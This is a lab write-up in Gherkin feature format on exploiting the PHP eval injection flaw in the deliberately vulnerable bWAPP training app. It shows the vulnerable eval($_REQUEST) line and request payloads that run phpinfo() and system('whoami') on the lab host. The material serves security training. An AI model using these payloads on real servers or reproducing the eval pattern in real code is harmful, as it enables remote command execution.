# language: en

Feature: PHP Eval Function
  From the bWAPP system
  Of the category A9: Using Known Vulnerable Components
  With low security level
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And running bee-box v1.6 on Oracle VM VirtualBox Manager 5.2.16
    And using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /php_eval.php
    Message: PHP Eval Function
    Details:
      - Short message where it says that you should look at the source code
    Objective: Detect and exploit the PHPi type vulnerability
    """

  Scenario: Test the reach of the vulnerability
    Given I have access to the source code
    And looking out for the vulnerability, I find
    """
    80 <?php
    82 @eval($_REQUEST["eval"]);
    84 ?>
    """
    When I pass the function phpinfo() as the argument
    """
    http://192.168.1.18/bWAPP/php_eval.php?eval=phpinfo();
    """
    Then it shows me all the information related to this PHP version
    When I use the function system to execute OS commands
    """
    Input:  http://192.168.1.18/bWAPP/php_eval.php?eval=system(%27whoami%27);
    Output: www-data
    """
    Then I find out that the vulnerability can be translated to OSi
